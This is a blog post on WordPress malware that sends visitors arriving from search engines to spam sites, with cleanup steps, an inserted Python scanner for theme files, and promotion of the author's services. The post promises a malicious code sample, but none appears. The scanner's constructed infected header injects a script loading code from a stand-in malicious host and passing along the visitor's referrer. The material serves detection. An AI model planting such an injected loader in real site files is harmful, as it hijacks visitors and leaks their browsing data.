Have you ever had an issue where the links in the Google or Yahoo (or other) search results redirect your visitors to some other spammy site and NOT your own site?
Well, if you have, then your site has malware on it or has been hacked. The typical symptoms of this particular malware are as follows:
For example, say your site ranks well for the search term “blueberry ice cream”. When someone types that search term into Google, they will sure enough see your site as one of the search results. But when they click on your link they get automatically redirected to someone else’s site – usually a smutty site, or one selling pharma products for enlarging the male appendage, or Viagra, or other similar sites... I’m sure you know what I mean.
However, if you were to type your website’s URL directly into the browser you would see no problem at all – i.e., your site’s page will display as expected and you would not be redirected to those spammy sites.
But how is this possible, I hear you ask? How can a link which you click from the Google search results, and which you know has your site’s URL in it, redirect you to someone else’s site?
The first clue is to view your site’s HTML source:
- Using your browser, type your site’s URL directly into the address bar
- After your page loads, right-click on the page and select “View Page Source” (or similar depending on the browser you are using)
When viewing your page source you may see some malicious JavaScript code similar to the following if you have been infected with this type of malware:
Basically, the above JavaScript code checks whether the visitor was referred to your site from another location, e.g., a Google search link.
If so, the code then spits out some more malicious JavaScript code where it pieces together a malicious URL with other query parameters. In this case the malicious URL is the one with the name “motaharico” in it, and if you observe closely you’ll see that the full path goes directly to a PHP file on that server. The effect of the above code is that the visitor will be surprised to find that instead of landing on your site, they are redirected to a porn or other site.
In most cases, the hackers achieve this clever little feat by hacking your site’s PHP files, or you may have downloaded an infected theme or plugin. For this case the header.php of your active theme likely contains the offending code.
If this is happening to you, FTP into your server and grab your theme’s header.php file and look for malicious code similar to that shown in the above example. If you find such code it means at the very least that you have downloaded an infected theme or plugin, or you have been hacked some other way which allowed the hackers to write code into your PHP files or add their own malicious files.
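As an added example (not part of the original article and not the author's tooling), here is a small Python triage script to run over a downloaded copy of your theme files. The heuristics, the names `scan_text` and `scan_tree`, and the two sample headers are assumptions constructed for illustration; it flags files that both read the referrer and write script, redirect, or decode a payload.

```python
import re
from pathlib import Path

# Heuristics chosen for this example (assumptions, not signatures from the article).
REFERRER = re.compile(r"document\.referrer|HTTP_REFERER", re.I)
EMITTERS = {
    "document.write": re.compile(r"document\.write(ln)?\s*\(", re.I),
    "runtime script element": re.compile(r"createElement\s*\(\s*['\"]script", re.I),
    "location change": re.compile(r"\blocation(\.href)?\s*=(?!=)|location\.replace\s*\(", re.I),
    "encoded payload": re.compile(r"\b(eval|unescape|atob|base64_decode|gzinflate)\s*\(|fromCharCode", re.I),
}

def scan_text(text):
    """Return sorted [(line_no, reason)] if the text both inspects the
    referrer and emits script, redirects or decodes a payload; else []."""
    lines = text.splitlines()
    refs = [(i, "referrer check") for i, l in enumerate(lines, 1) if REFERRER.search(l)]
    hits = [(i, name) for i, l in enumerate(lines, 1)
            for name, rx in EMITTERS.items() if rx.search(l)]
    if not refs or not hits:
        return []  # a referrer read alone, or a script write alone, is too common to flag
    return sorted(refs + hits)

def scan_tree(root):
    """Scan every PHP/JS/HTML file under root; return {path: findings}."""
    report = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in {".php", ".js", ".html", ".htm"}:
            findings = scan_text(path.read_text(errors="replace"))
            if findings:
                report[str(path)] = findings
    return report

# Constructed samples: a clean theme header and the same header with an injected block.
CLEAN_HEADER = """<!DOCTYPE html>
<html <?php language_attributes(); ?>>
<head>
<?php wp_head(); ?>
</head>
"""
INFECTED_HEADER = CLEAN_HEADER + """<script>
if (document.referrer) {
  document.write('<script src="//malicious.example.invalid/placeholder.php?r=' + encodeURIComponent(document.referrer) + '"></scr' + 'ipt>');
}
</script>
"""

if __name__ == "__main__":
    for name, body in (("clean", CLEAN_HEADER), ("infected", INFECTED_HEADER)):
        print(name, scan_text(body))
```

Legitimate code also reads the referrer, so treat a hit as a file to review by hand, not as proof of infection.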
For those who have been infected with something like the above malware, at the very least you should do the following:
- Update your WordPress version if you don’t currently have the latest release.
- Deactivate and delete your plugins and re-install a clean fresh version for each one.
- Deactivate and delete your active and inactive themes and re-install clean versions. (if you are not using certain themes just delete them)
- Change your WordPress password (make sure that you use a strong password with 10 or more characters)
- Change any passwords for your server such as FTP accounts and cPanel login
- Change the database password and update the wp-config.php file with the new password.
Always re-download fresh versions of your plugins and themes from wordpress.org or the developer you got them from. Also, never download themes or plugins from untrusted sources such as sites claiming to offer “premium” plugins or themes for free which are normally sold on another site.
Sometimes the malware can be quite hard to find or it keeps coming back, and for cases like that you will need to carefully go through your file system and weed out any backdoor files and other infected files. (I also offer a malware cleaning service if you need help – just contact me directly)
I have cleaned my fair share of sites to get rid of malware for my clients and I’ve seen many interesting and disturbing ways hackers are trying to deface or hijack websites and this is one of many. We should all be vigilant when it comes to our websites because being hacked and then penalised or blacklisted by Google can be a painful experience especially when you’ve put so much effort in building your site up.
The most important thing is to be informed immediately as soon as you are infected so that you can take corrective action. One easy and cost-effective way to do this is to have your site automatically scanned daily by our malware site-scanners service. If the scanner finds any malware or suspicious content you will get an email immediately informing you about the problem.